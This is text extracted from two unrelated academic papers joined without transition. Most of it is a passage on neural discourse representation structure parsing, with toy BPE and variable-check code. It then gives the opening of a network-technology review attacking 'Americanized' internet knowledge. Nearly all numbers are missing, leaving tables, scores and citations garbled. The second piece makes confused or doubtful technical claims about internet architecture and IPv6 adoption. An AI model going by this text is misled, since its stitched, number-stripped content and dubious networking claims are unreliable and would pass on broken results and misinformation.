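the merge procedure itself can be sketched in a few lines, following the frequency-based recipe of sennrich et al.: starting from characters, the most frequent adjacent symbol pair in a word-frequency vocabulary is repeatedly merged into a single symbol. the toy vocabulary below is illustrative; this is not the subword-nmt implementation used for the actual experiments.

```python
from collections import Counter

def pair_frequencies(vocab):
    """Count adjacent symbol pairs over a {tuple_of_symbols: frequency} vocab."""
    pairs = Counter()
    for symbols, freq in vocab.items():
        for a, b in zip(symbols, symbols[1:]):
            pairs[(a, b)] += freq
    return pairs

def merge_pair(pair, vocab):
    """Replace every occurrence of the given adjacent pair by one merged symbol."""
    merged = {}
    for symbols, freq in vocab.items():
        out, i = [], 0
        while i < len(symbols):
            if i < len(symbols) - 1 and (symbols[i], symbols[i + 1]) == pair:
                out.append(symbols[i] + symbols[i + 1])
                i += 2
            else:
                out.append(symbols[i])
                i += 1
        merged[tuple(out)] = freq
    return merged

def learn_bpe(vocab, num_merges):
    """Perform a fixed number of greedy merges of the most frequent pair."""
    for _ in range(num_merges):
        pairs = pair_frequencies(vocab)
        if not pairs:
            break
        vocab = merge_pair(pairs.most_common(1)[0][0], vocab)
    return vocab

if __name__ == "__main__":
    # toy word-frequency vocabulary, with words split into characters
    vocab = {tuple("afraid"): 3, tuple("afar"): 2, tuple("aid"): 4}
    print(learn_bpe(vocab, num_merges=3))
```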
we explore a large range of merges ( k– k), while applying a corresponding set of pre-trained bpe embeddings (heinzerling and strube, ). however, none of the bpe experiments improved on the character-level or word-level score (f-scores between and ), only coming close when using a small number of merges (which is very close to character-level anyway). therefore this technique was disregarded for further experiments.

combined char and word. there is also a fourth possible representation of the input: concatenating the character-level and word-level representations. this is uncommon in nmt because of the large size of the embedding space (hence their preference for bpe), but possible here since the pmb data contain relatively short sentences. we simply add the word embedding vector after the sequence of character-embeddings for each word in the input and still initialize these embeddings using the pre-trained glove embeddings (the common crawl version trained on billion tokens, vector size ).

representation results. the results of the experiments ( -fold cv) for finding the best representation are shown in table , which reports precision, recall, f-score, and the percentage of ill-formed drss (% ill) for the char, word, and char + word input representations. character representations are clearly better than word representations, though the word-level representation produces fewer ill-formed drss. both representations are maintained for our further experiments. although the combination of characters and words did lead to a small increase in performance over characters only (table ), this difference is not significant. hence, this representation is discarded in further experiments described in this paper.

tokenization. an interesting aspect of the pmb data is the way the input sentences are tokenized. in the data set, multiword expressions are tokenized as single words, for example, "new york" is tokenized to "new∼york." unfortunately, most off-the-shelf tokenizers (e.g., the moses tokenizer) are not equipped to deal with this. we experiment with using elephant (evang et al., ), a tokenizer that can be (re-)trained on individual data sets, using the tokenized sentences of the published silver and gold pmb data set. simultaneously, we are interested in whether character-level models need tokenization at all, which would be a possible advantage of this type of representing the input text. gold tokenization is available in the data set, but using this would not reflect practical applications of drs parsing, as we want raw text as input for a realistic setting. results of the experiment are shown in table . none of the two tokenization methods yielded a significant advantage for the character-level models, so they will not be used further. the word-level models, however, did benefit from tokenization, but elephant did not give us an advantage over the moses tokenizer. therefore, for word-level models, we use moses in our subsequent experiments.

representing variables. so far we did not attempt to do anything special with the variables that occur in drss, as we simply tried to learn them as supplied in the pmb data set. obviously, drss constitute a challenge for seq seq models because of the high number of multiple occurrences of the same variables, in particular compared with amr. amr parsers do not deal well with this, because the reentrancy metric (damonte et al., ) is among the lowest metrics for all amr parsers that reported them or are publicly available (van noord and bos, b). moreover, for amr, only % of the representations contain at least one reentrant node, and only % of the triples in amr contain a reentrant node (van noord and bos, a), but for drss these are both virtually %. although seq seq amr parsers could get away with ignoring variables during training and reinstating them in a post-processing step, for drss this is unfeasible.

however, because variable names are chosen arbitrarily, they will be hard for a seq seq model to learn. we will therefore experiment with two methods of rewriting the variables to a more general representation, distinguishing between box variables and discourse variables. our first method (absolute) traverses down the list of clauses, rewriting each new variable to a unique representation, taking the order into account. the second method (relative) is more sophisticated; it rewrites variables based on when they were introduced, inspired by the de bruijn index (de bruijn, ). we view box variables as introduced when they are first mentioned, and we take the ref clause of a discourse referent as their introduction. the two rewriting methods are illustrated in figure .

figure : different methods of variable naming ((a) standard, (b) absolute, and (c) relative) exemplified on the clausal form of figure . for (c), positive numbers refer to introductions that have yet to occur, and negative numbers refer to known introductions. a zero refers to the previous introduction for that variable type.

the results are shown in table , which covers the -fold cv experiments regarding tokenization, variable rewriting, and casing (baseline, moses, elephant, absolute, relative, lowercase, truecase, and the casing feature); bs/mos means that we use no tokenization for the character-level parser, while we use moses for the word-level parser. for both characters and words, the relative rewriting method significantly outperforms the absolute method and the baseline, though the absolute method produces fewer ill-formed drss. interestingly, the character-level model still obtains a higher f-score compared to the word-level model, even though it produces more ill-formed drss.

figure : learning curve for different number of gold instances for both the character-level and word-level neural parsers ( -fold cv experiment for every instances).

casing. casing is a writing device mostly used for punctuation purposes. on the one hand, it increases the set of characters (hence adding more redundant variation to the input).
on the other hand, case can be a useful feature to recognize proper names because names of individuals are semanti- cally analysed as presuppositions. explicitly en- coding uppercase with a feature could therefore prevent us from including a named-entity recog- nizer, often used in other semantic parsers. al- though we do not expect dealing with case to be a major challenge, we try out different techniques to find an optimal balance between abstracting over input characters and parsing performance. the re- sults, in table , show that the feature works well for the character-level model, but for the word- level model, it does not outperform lowercasing. these settings are used in further experiments. experiments with additional data because semantic annotation is a difficult and time-consuming task, gold standard data sets are usually relatively small. this means that semantic parsers (and data-hungry neural methods in par- ticular) can often benefit from more training data. some examples in semantic parsing are data re- combination (jia and liang, ), paraphrasing (berant and liang, ), or exploiting machine- generated output (konstas et al., ). however, before we do any experiments using extra train- ing data, we want to be sure that we can still ben- char parser word parser data f % ill f % ill best gold-only . . . . + ensemble . . . . gold + silver . . . . + ensemble . . . . table : f -score and percentage of ill-formed drss on the test set, for the experiments with the pmb-released silver data. the scores without us- ing an ensemble are an average of five runs of the model. efit from more gold training data. for both the character level and word level we plot the learn- ing curve, adding training instances at a time, in figure . for both models the f-score clearly still improves when using more training instances, which shows that there is at least the potential for additional data to improve the score. for drss, the pmb- . . release already con- tains a large set of silver standard data ( , in- stances), containing drss that are only partially manually corrected. we then train a model on both the gold and silver standard data, making no distinction between them during training. after train- ing we take the last model and restart the train- ing on only the gold data, in a similar process as described in konstas et al. ( ) and van noord and bos ( b). in general, restarting the train- ing to fine-tune the weights of the model is a com- mon technique in nmt (denkowski and neubig, ). we are aware that there are many methods to obtain and utilize additional data. however, our main aim is not to find the optimal method for drs parsing, but to demonstrate that using additional data is indeed beneficial for neural drs parsing. because we are not further fine-tuning our model, we will show results on the test set in this section. table shows the results of adding the sil- ver data. this results in a large increase in per- formance, for both the character- and word-level models. we are still reliant on manually annotated data, however, because without the gold data (so training on only the silver data), we score even lower than our baseline model ( . and . for the char and word parser). similarly, we are reliant on the fine-tuning procedure, as we also score be- low our baseline models without it ( . and . for the char and word parsers, respectively). char parser word parser data f % ill f % ill silver (boxer-generated) . . . . bronze (boxer-generated) . . . . bronze (nn-generated) . . . . 
without ill-formed drss . . . . table : test set results of the experiments that analyze the impact of the silver data. we believe there are two possible factors that could explain why the addition of silver data re- sults in such a large improvement: (i) the fact that the data are silver instead of bronze or (ii) the fact that a different drs parser (boxer, see § ) is used to create the silver data instead of our own parser. we conduct an experiment to identify the impact on performance of silver versus bronze and boxer versus our parser. the results are shown in table . note that these experiments are per- formed to analyze the impact of the silver data, not to further push the score, meaning silver (boxer- generated) is our final model that will be com- pared to other approaches in § . for factor (i), we compare the performance of the model trained on silver and bronze versions of the exact same documents (so leaving out the man- ual corrections). interestingly, we score slightly higher for the character-level model with bronze than with silver (though the difference is not statis- tically significant), meaning that the extra manual corrections are not beneficial (in their current for- mat). this suggests that the silver data are closer to bronze than to the gold standard. for factor (ii), we use our own best parser (with- out silver data) to parse the sentences in the pmb silver data release and use that as additional train- ing data. because the silver data contain longer and more complicated sentences than the gold data, our best parser produces more ill-formed drss ( . % for char and . % for word). we can either discard those instances or still main- tain them for the model to learn from. for boxer this is not an issue since only . % of drss produced were ill-formed. we observe that a full self-training pipeline results in lower performance compared with using boxer-produced drss. in fact, this does not seem to be beneficial over only using the gold standard data. most likely, note that we cannot apply the manual corrections, so in pmb terminology, these data are bronze instead of silver. prec rec f-score spar . . . sim-spar . . . amr drs . . . boxer . . . neural char . . . neural word . . . neural char + silver . . . neural word + silver . . . table : test set results of our best neural models compared to two baseline models and two parsers. because boxer combines symbolic and statistical methods, it learns very different things from our neural parsers, which in turn provides more valu- able information to the model. a more detailed analysis on the difference in (semantic) output is performed in § . and . . removing ill-formed drss before training leads to higher f-scores for both the char and word parsers, as well as a lower number of ill-formed drss. discussion . comparison in this section, we compare our best neural mod- els (with and without silver data, see table ) with two baseline systems and with two drs parsers: amr drs and boxer. amr drs is a parser that obtains drss from amrs by apply- ing a set of rules (van noord et al., ), in our case using amrs produced by the amr parser of van noord and bos ( b). boxer is an existing drs parser using a statistical combinatory cate- gorical grammar parser for syntactic analysis and a compositional semantics based on λ-calculus, fol- lowed by pronoun and presupposition resolution (curran et al., ; bos, b). spar is a base- line parser that outputs the same (fixed) default drs for each input sentence. 
we implemented a second baseline model, sim-spar, which outputs, for each sentence in the test set, the drs of the most similar sentence in the training set. this sim- ilarity is calculated by taking the cosine similar- ity of the average word embedding vector (with removed stopwords) based on the glove embed- dings (pennington et al., ). table shows the result of the comparison. the neural models comfortably outperform the baselines. we see that both our neural models char word boxer all clauses . . . drs operators . . . verbnet roles . . . wordnet synsets . . . nouns . . . verbs, adverbs, adj. . . . oracle sense numbers . . . oracle synsets . . . oracle roles . . . table : f-scores of fine-grained evaluation on the test set of the three semantic parsers. outperform boxer by a large margin when using the boxer-labeled silver data. however, even with- out this dependence, the neural models perform significantly better than boxer. it is worth noting that the character-level model significantly outper- forms the word-level model, even though it can- not benefit from pre-trained word embeddings and from a tokenizer. concurrently with our work, a neural drs parser has been developed by liu et al. ( ). they use a customized neural seq seq model that produces the drs in three stages. it first pre- dicts the general (deep) structure of the drss, after which the conditions and referents are filled in. unfortunately, they train and evaluate their parser on annotated data from the gmb rather than from the pmb (see § ). this, combined with the fact that their work is contemporaneous to the current paper, make it difficult to compare the ap- proaches. however, we see no apparent reason why their method should not work on the pmb data. . analysis an intriguing question is what our models actually learn, and what parts of meaning are still challeng- ing for neural methods. we do this in two ways, by performing an automatic analysis and by doing a manual inspection on a variety of semantic phe- nomena. table shows an overview of the differ- ent automatic evaluation metrics we implemented, with corresponding scores of the three models. the character- and word-level systems perform comparably in all categories except for verbnet roles, where the character-based parser shows a clear advantage ( . percentage point difference). the score for wordnet synsets is similar, but sentence length (words) . . . . . . f- sc or e boxer char word figure : performance of each parser for sen- tences of different length. the word-level model has more difficulty predict- ing synsets that are introduced by verbs than for nouns. it is clear that the neural models outper- form boxer consistently on each of these met- rics (partly because boxer picks the first sense by default). what also stands out is the impact of the word senses: with a perfect word sense- disambiguation module (oracle senses), large im- provements can be gained for all three parsers. it is interesting to look at what errors the model makes in terms of producing ill-formed output. for both the neural parsers, only about % of the ill-formed drss are ill-formed because of a syntactic error in an individual clause (e.g., b agent x , where a fourth argument is missing), whereas all the other errors are due to a violated semantic constraint (see § . ). in other words, the produced output is a syntactically well-formed drs but is not interpretable. 
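a much-simplified sketch of the sort of constraint involved is given below: every entity variable used in a condition must be introduced somewhere by a ref clause. the full checker described in the method section also types variables and verifies accessibility between boxes, which this sketch ignores; the variable-name pattern is our own toy assumption.

```python
import re

def unintroduced_variables(clauses):
    """Return entity variables that are used in a condition but never
    introduced by a REF clause (a much-simplified free-variable check)."""
    introduced, used = set(), set()
    for clause in clauses:
        parts = clause.split()
        operator, args = parts[1], parts[2:]
        # toy assumption: entity variables look like x1, e1, s1, t1
        ents = [a for a in args if re.fullmatch(r"[xest]\d+", a)]
        if operator == "REF":
            introduced.update(ents)
        else:
            used.update(ents)
    return used - introduced

if __name__ == "__main__":
    # toy output with a missing introduction for x2
    clauses = ["b1 REF x1", "b1 male x1", "b1 Stimulus s1 x2", "b1 REF s1"]
    print(unintroduced_variables(clauses))  # -> {'x2'}
```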
to find out how sentence length affects per- formance, we plot in figure the mean f-score obtained by each parser on input sentences of different lengths, from to words. we ob- serve that all the parsers degrade with sentence length. to identify whether any of the parsers de- grades significantly more than any other, we build a regression model in which we predict the f- score using as predictors the parser (char, word, and boxer), the sentence length, and the num- ber of clauses produced. according to the re- gression model, (i) the performance of all three shorter and longer sentences are excluded as there are fewer than input sentences for any such length—for ex- ample, there are only three sentences that have two words. systems decreases with sentence length, thus cor- roborating the trends shown in figure and (ii) the interaction between parser and sentence length is not significant (i.e., none of the parsers decreases significantly more than any other with sentence length). the fact that the performance of the neu- ral parsers degrades with sentence length is not surprising, because they are based on the seq seq architecture, and models built on this architecture for other tasks, such as machine translation, have been shown to have the same issue (toral and sánchez-cartagena, ). . manual inspection the automatic evaluation metrics provide overall scores but do not capture how the models per- form on certain semantic phenomena present in the drss. therefore, we manually inspected the test set output of the three parsers for the seman- tic phenomena listed in table . we here describe each phenomenon and explain how the parser out- put is evaluated on them. the negation & modals phenomenon cov- ers possibility (pos), necessity (nec), and nega- tion (not). the phenomenon is considered successfully captured if an automatically pro- duced clausal form has the clause with the modal operator and the main concept is correctly put under the scope of the modal operator. for exam- ple, to capture the negation in figure , the pres- ence of b not b and b afraid "a. " s is sufficient. scope ambiguity counts nested pairs of scopal operators such as possibility (pos), necessity (nec), negation (not), and implication (imp). pronoun resolution checks if an anaphoric pronoun and its antecedent are represented by the same discourse referent. discourse relation & implication involves deter- mining a discourse relation or an implication with a main concept in each of their scopes (i.e., boxes). for instance, to get the discourse relation in fig- ure correctly, a clausal form needs to include b continuation b b , b play "v. " e , and b sing "v. " e . finally, the embedded clauses phenomenon verifies whether the main verb concept of an embedded clause is placed inside the propositional box (prp). this phe- nomenon also covers control verbs: it checks whether a controlled argument of a subordinate verb is correctly identified as an argument of a control verb. phenomenon # char word boxer negation & modals . . . scope ambiguity . . . pronoun resolution . . . discourse rel. & imp. . . . embedded clauses . . . table : manual evaluation of the output of the three semantic parsers on several semantic phe- nomena. reported numbers are accuracies. the results of the semantic evaluation of the parsers on the test set is given in table . the character-level parser performs better than the word-level parser on all the phenomena ex- cept one. 
even though both our neural parsers clearly outperformed boxer in terms of f-score, they perform worse than boxer on the selected se- mantic phenomena. although the differences are not big, boxer obtained the highest score for four out of five phenomena. this suggests that just the f-score is perhaps not good enough as an evalua- tion metric, or that the final f-score should perhaps be weighted towards certain clauses. for example, it is arguably more important to capture a nega- tion correctly than tense. our current metric only gives a rough indication about the contents, but not about the inferential capabilities of the meaning representation. conclusions and future work we implemented a general, end-to-end neural seq seq model that is able to produce well-formed drss with high accuracy (rq ). character-level models can outperform word-level models, even though they are not dependent on tokenization and pre-trained word embeddings (rq ). it is beneficial to rewrite drs variables to a more general representation (rq ). obtaining and us- ing additional data can benefit performance as well, though it might be better to use an exter- nal parser rather than doing a full self-training pipeline (rq ). f-score is only a rough measure for semantic accuracy: boxer still outperformed our best neural models on a subset of specific semantic phenomena (rq ). we think there are many opportunities for fu- ture work. because the sentences in the pmb data set are relatively short, it makes sense to investi- gate seq seq models performing well for longer texts. there are a few promising directions here that could combat the degrading performance on longer sentences. first, the transformer model (vaswani et al., ) is an interesting candidate for exploration, a state-of-the-art neural model de- veloped for mt that does not have worse perfor- mance for longer sentences. second, a seq seq model that is able to first predict the general struc- ture of the drs, after which it can fill in the de- tails, similar to liu et al. ( ), is something that could be explored. a third possibility is a neural parser that tries to build the drs incrementally, producing clauses for different parts of the sen- tence individually, and then combining them to a final drs. concerning the evaluation of drs parsers, we feel there are a couple of issues that could be addressed in future work. one idea is to facil- itate computing f-scores tailored to specific se- mantic phenomena that are dubbed important, so the evaluation we performed in this paper manu- ally could be carried out automatically. another idea is to evaluate the application of drss to improve performance on other linguistic or seman- tic tasks in which drss that capture the full se- mantics will, presumably, have an advantage. a combination of glass-box and black-box evalua- tion seems a promising direction here (bos, a; van noord et al., ). acknowledgments this work was funded by the nwo-vici grant “lost in translation—found in meaning” ( - - ). the tesla k gpu used in this work was kindly donated to us by the nvidia corpo- ration. we also want to thank the three anonymous reviewers for their comments. references lasha abzianidze, johannes bjerva, kilian evang, hessel haagsma, rik van noord, pierre ludmann, duc-duy nguyen, and johan bos. . the parallel meaning bank: towards a multilingual corpus of translations annotated with compositional meaning representations. 
in proceedings of the th conference of the eu- ropean chapter of the association for compu- tational linguistics: volume , short papers, pages – , valencia, spain. association for computational linguistics. lasha abzianidze and johan bos. . towards universal semantic tagging. in proceedings of the th international conference on computa- tional semantics (iwcs ) – short papers, montpellier, france. association for computa- tional linguistics. david alvarez-melis and tommi s. jaakkola. . tree-structured decoding with doubly- recurrent neural networks. in proceedings of the international conference on learning repre- sentations (iclr). nicholas asher. . reference to abstract objects in discourse. kluwer academic publishers. nicholas. asher and alex. lascarides. . log- ics of conversation. studies in natural language processing. cambridge university press. laura banarescu, claire bonial, shu cai, madalina georgescu, kira griffitt, ulf hermjakob, kevin knight, philipp koehn, martha palmer, and nathan schneider. . abstract meaning representation for sem- banking. in proceedings of the th linguistic annotation workshop and interoperability with discourse, pages – , sofia, bulgaria. valerio basile, johan bos, kilian evang, and noortje venhuizen. . developing a large semantically annotated corpus. in proceedings of the eighth international conference on lan- guage resources and evaluation (lrec ), pages – , istanbul, turkey. david i. beaver. . presupposition projection in drt: a critical assesment. in the con- struction of meaning, pages – . stanford university. jonathan berant and percy liang. . seman- tic parsing via paraphrasing. in proceedings of the nd annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . johannes bjerva, barbara plank, and johan bos. . semantic tagging with deep resid- ual networks. in proceedings of coling , the th international conference on computational linguistics: technical papers, pages – , osaka, japan. http://www.aclweb.org/anthology/e - http://www.aclweb.org/anthology/e - http://www.aclweb.org/anthology/e - http://aclweb.org/anthology/w - http://aclweb.org/anthology/w - http://books.google.com.au/books?id=vd- yisfhbwc http://books.google.com.au/books?id=vd- yisfhbwc http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - patrick blackburn and johan bos. . repre- sentation and inference for natural language. a first course in computational semantics. csli. ondřej bojar, rajen chatterjee, christian federmann, yvette graham, barry haddow, shujian huang, matthias huck, philipp koehn, qun liu, varvara logacheva, christof monz, matteo negri, matt post, raphael rubino, lucia specia, and marco turchi. . find- ings of the conference on machine translation (wmt ). in proceedings of the second conference on machine translation, volume : shared task papers, pages – , copenhagen, denmark. association for computational linguistics. claire bonial, william j. corvey, martha palmer, volha petukhova, and harry bunt. . a hi- erarchical unification of lirics and verbnet semantic roles. in proceedings of the th ieee international conference on semantic comput- ing (icsc ), pages – . johan bos. a. let’s not argue about seman- tics. in proceedings of the th language resources and evaluation conference (lrec ), pages – , marrakech, morocco. johan bos. b. wide-coverage semantic anal- ysis with boxer. in semantics in text pro- cessing. step conference proceedings, volume of research in computational seman- tics, pages – . 
college publications. johan bos. . open-domain semantic pars- ing with boxer. in proceedings of the th nordic conference of computational linguis- tics (nodalida ), pages – . johan bos, valerio basile, kilian evang, noortje venhuizen, and johannes bjerva. . the groningen meaning bank. in nancy ide and james pustejovsky, editors, handbook of lin- guistic annotation. springer netherlands. denny britz, anna goldie, minh-thang luong, and quoc le. . massive exploration of neural machine translation architectures. in proceedings of the conference on empir- ical methods in natural language processing, pages – . nicolaas govert de bruijn. . lambda calcu- lus notation with nameless dummies, a tool for automatic formula manipulation, with applica- tion to the church-rosser theorem. in indaga- tiones mathematicae (proceedings), volume , pages – . elsevier. jan buys and phil blunsom. . robust incremental neural semantic graph parsing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . shu cai and kevin knight. . smatch: an evaluation metric for semantic feature struc- tures. in proceedings of the st annual meeting of the association for computa- tional linguistics (volume : short papers), pages – , sofia, bulgaria. association for computational linguistics. james curran, stephen clark, and johan bos. . linguistically motivated large-scale nlp with c&c and boxer. in proceedings of the th annual meeting of the association for computational linguistics companion volume proceedings of the demo and poster sessions, pages – , prague, czech republic. marco damonte, shay b. cohen, and giorgio satta. . an incremental parser for ab- stract meaning representation. in proceedings of the th conference of the european chapter of the association for computational linguis- tics: volume , long papers, pages – , valencia, spain. association for computational linguistics. michael denkowski and graham neubig. . stronger baselines for trustable results in neu- ral machine translation. in proceedings of the first workshop on neural machine translation, pages – , vancouver. association for com- putational linguistics. li dong and mirella lapata. . language to logical form with neural attention. in proceed- ings of the th annual meeting of the associ- ation for computational linguistics (volume : long papers), pages – , berlin, germany. association for computational linguistics. jan van eijck and hans kamp. . repre- senting discourse in context. in johan van http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.springer.com/la/book/ http://www.springer.com/la/book/ http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - benthem and alice ter meulen, editors, hand- book of logic and language, pages – . elsevier, mit. kilian evang, valerio basile, grzegorz chrupała, and johan bos. . elephant: sequence labeling for word and sentence segmentation. in proceedings of the conference on empirical methods in natural language pro- cessing (emnlp), pages – , seattle, washington, usa. christiane fellbaum, editor. . wordnet. an electronic lexical database. the mit press, cambridge, ma., usa. bart geurts. . presuppositions and pronouns, volume of current research in the semantic- s/pragmatics interface. elsevier. xiaodong he and david golub. . 
character- level question answering with attention. in proceedings of the conference on empir- ical methods in natural language processing, pages – . benjamin heinzerling and michael strube. . bpemb: tokenization-free pre-trained subword embeddings in languages. in proceedings of the eleventh international conference on language resources and evaluation (lrec ), paris, france. european language resources association (elra). robin jia and percy liang. . data recombina- tion for neural semantic parsing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . mark johnson and ewan klein. . discourse, anaphora and parsing. in th international conference on computational linguistics. pro- ceedings of coling ’ , pages – , univer- sity of bonn. nirit kadmon. . formal pragmatics. blackwell. hans kamp. . a theory of truth and se- mantic representation. in jeroen groenendijk, theo m.v. janssen, and martin stokhof, editors, truth, interpretation and information, pages – . foris, dordrecht – holland/ cinnaminson – u.s.a. hans kamp and uwe reyle. . from dis- course to logic; an introduction to model the- oretic semantics of natural language, formal logic and drt. kluwer, dordrecht. guillaume klein, yoon kim, yuntian deng, jean senellart, and alexander rush. . open- nmt: open-source toolkit for neural machine translation. in proceedings of acl , sys- tem demonstrations, pages – . association for computational linguistics. ioannis konstas, srinivasan iyer, mark yatskar, yejin choi, and luke zettlemoyer. . neu- ral amr: sequence-to-sequence models for parsing and generation. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , vancouver, canada. association for computational linguistics. phong le and willem zuidema. . learning compositional semantics for open domain se- mantic parsing. proceedings of coling , pages – . wang ling, phil blunsom, edward grefenstette, karl moritz hermann, tomáš kočiskỳ, fumin wang, and andrew senior. . latent predictor networks for code generation. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . jiangming liu, shay b. cohen, and mirella lapata. . discourse representation struc- ture parsing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in proceedings of the conference on empirical methods in natural language pro- cessing, pages – , lisbon, portugal. association for computational linguistics. reinhard muskens. . combining montague semantics and discourse representation. lin- guistics and philosophy, : – . http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - rik van noord, lasha abzianidze, hessel haagsma, and johan bos. . evaluating scoped meaning representations. in proceed- ings of the eleventh international conference on language resources and evaluation (lrec ), paris, france. european language re- sources association (elra). rik van noord and johan bos. a. dealing with co-reference in neural semantic parsing. 
in proceedings of the nd workshop on semantic deep learning (semdeep- ), pages – . rik van noord and johan bos. b. neural semantic parsing by character-based transla- tion: experiments with abstract meaning rep- resentations. computational linguistics in the netherlands journal, : – . eric w. noreen. . computer-intensive meth- ods for testing hypotheses. wiley new york. jeffrey pennington, richard socher, and christopher manning. . glove: global vectors for word representation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . fernando pereira and stuart shieber. . prolog and natural language analysis. csli lecture notes . chicago university press, stanford. rob a. van der sandt. . presupposition projection as anaphora resolution. journal of semantics, ( ): – . rico sennrich, barry haddow, and alexandra birch. a. edinburgh neural machine trans- lation systems for wmt . in proceedings of the first conference on machine transla- tion: volume , shared task papers, volume , pages – . rico sennrich, barry haddow, and alexandra birch. b. neural machine translation of rare words with subword units. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , berlin, germany. nitish srivastava, geoffrey hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neu- ral networks from overfitting. the journal of machine learning research, ( ): – . ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neu- ral networks. in z. ghahramani, m. welling, c. cortes, n. d. lawrence, and k. q. weinberger, editors, advances in neural information pro- cessing systems , pages – . curran associates, inc. antonio toral and víctor m. sánchez-cartagena. . a multifaceted evaluation of neural versus phrase-based machine translation for language directions. in proceedings of the th conference of the european chapter of the association for computational linguistics: volume , long papers, pages – , valencia, spain. association for computational linguistics. ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n. gomez, Łukasz kaiser, and illia polosukhin. . attention is all you need. in advances in neural information processing systems, pages – . hajime wada and nicholas asher. . buildrs: an implementation of dr theory and lfg. in th international conference on computational linguistics. proceedings of coling ’ , pages – , university of bonn. john m. zelle and raymond j. mooney. . learning to parse database queries using induc- tive logic programming. in proceedings of the national conference on artificial intelligence, pages – . https://doi.org/ . /jos/ . . https://doi.org/ . /jos/ . . http://www.aclweb.org/anthology/e - http://www.aclweb.org/anthology/e - http://www.aclweb.org/anthology/e - international journal of advanced network, monitoring and controls volume , no. , doi: . 
/ijanmc- - review of network technology system from the past, present to the future mou chengjin china international strategic research center of mobile communications joint association beijing, , china, e-mail: mcjzp @ .com guo xiaohui henan vocational college of agriculture zhengzhou, , china, e-mail: mcjzp @ .com abstract—since china's public network got access to the internet in , the study, research and understanding of the internet have been blindly superstitious to the united states for a long time, copying the rules and regulations of the united states, and the textbooks in the field of internet and information are almost completely americanized. for more than years, we have not formed our own systematic and profound research and practical views on the internet, most of which are based on the half understood, ignorant, and parrot- like knowledge and cognition instilled from the united states. being controlled by others in ideology is even worse than in technology. at present, china's understanding of the internet is very superficial from the superior to inferior. we failed to firmly grasp the technology controlled by others and legal key points. we didn’t adhere to independent innovation, which resulted in that we were repeatedly passive or even long-term passiveness in cyberspace strategies and tactics. this paper will start from the history and technical characteristics of the emergence of the internet, comprehensively discuss the problems that have existed since the emergence of the internet more than years ago, and reflect on the future development of the international network, making the internet a truly open and shared international network. keywords-network; internet; future network i. introduction the computer network refers to the computer system which can provide transmission, storage, analysis and sharing of data for the purpose of acquiring and mastering data. it serves for the needs of communication with others. two or more computer networks with communication protocol, transmission channel and infrastructure interoperability constitute a computer network interconnection and interworking system that connects and shares data. strictly speaking, it can be called interconnected network. future network or an international network system consists of all ubiquitous networks connected, interacting and sharing different carriers, sources, function-matching and operating purposes, whether wired or wireless, ground or space. the current internet is just a computer network using a single tcp/ip communication protocol, not two or more interconnected networks. it is not the interconnection or internet by the exact definition, so it can’t be called an interconnected net, or rather it may be called a computer connected system. if the origin is wrong, everything is wrong. this is especially true of our understanding of interconnected networks. what is the network? what is the interconnected network? what is the future network? what is the different or relationship between ipv , ipv or even ipv ? what are the fundamental drawbacks of internet architecture and principles? do we have safe, credible and effective response plans and coordination measures for the newly-emerging problems, new things, new technologies and new spaces in the process of intelligent network development? we all need to advance with the times to re-understand, redefine, re- explore and re-study it. 
we need to take the opportunity to seriously correct the deviation and mistakes in cognition and knowledge, and let the network users, the people across the country and our future generations know the facts in a practical way. ii. architecture of the internet it is generally believed that the american internet, which adopts ipv technical protocol, has entered the post ipv era due to the lack of address design. at present, renting ipv address and adopting ipv technical protocol constitute the internet of various mailto:mcjzp @ .com mailto:mcjzp @ .com international journal of advanced network, monitoring and controls volume , no. , countries, which is still the mainstream of computer network. the u.s. military says its ipv address can be used until the end of . in recent years, the united states has continued to assign ipv addresses to the united states and other countries around the world, excluding china. ipv protocol is designed to solve the problem of ipv address shortage. it can provide address scale, and that's all. the application and resolution of ipv address is still based on the network architecture of ipv , that is, the original, traditional and irreversible design architecture of the internet and the tree network architecture (ipv ) continuously improved, strengthened and tightly controlled by the u.s. government and military. it is inevitable that ipv can't interoperate with ipv in technology, which is bound to lead to the confusion of network architecture and operation. therefore, ipv special network architecture has to be rebuilt to replace ipv network architecture (involving almost all the network software and hardware of infrastructure), which constitutes a "subversion" of the internet based on ipv in fact. after more than ten years of transitional practice, the united states has found that the cost of rebuilding ipv network is too large, there are too many security traps, and the technical agreement is not mature. besides, "subverting" ipv has brought about a series of extremely serious problems in economy, society and military. in fact, the u.s. military and government have abandoned ipv transition plans since . in , the adoption rate of ipv in the united states dropped from the first in the world to the third. on july , , the internet engineering task force (ietf) of the united states issued rfc , which announced the latest standard (std ) of the sixth edition of internet protocol (ipv ). at the same time, it abandoned the rfc (ipv draft) proposed in december , and deleted the "next generation internet protocol ipng" which was in transition to ipv . over the past few years, the widespread introduction of new data protection regulations around the world is having a dramatic impact on technology companies and consumers around the world, resulting in some previously established best practices in ietf procedures and regulatory requirements becoming undesirable, the u.s. internet regional working group (intarea) said. please note that the u.s. internet engineering task force issued the official document rfc (bcp ) in may , namely, "intellectual property issues in ietf technology", which provide three basic principles for ietf to deal with internet intellectual property claims (discarding rfc and rfc simultaneously): ) the ietf will not determine the validity of any specific intellectual property claim. ) in following the normal practice? the ietf can decide to use technology that has been exposed as intellectual property if necessary. 
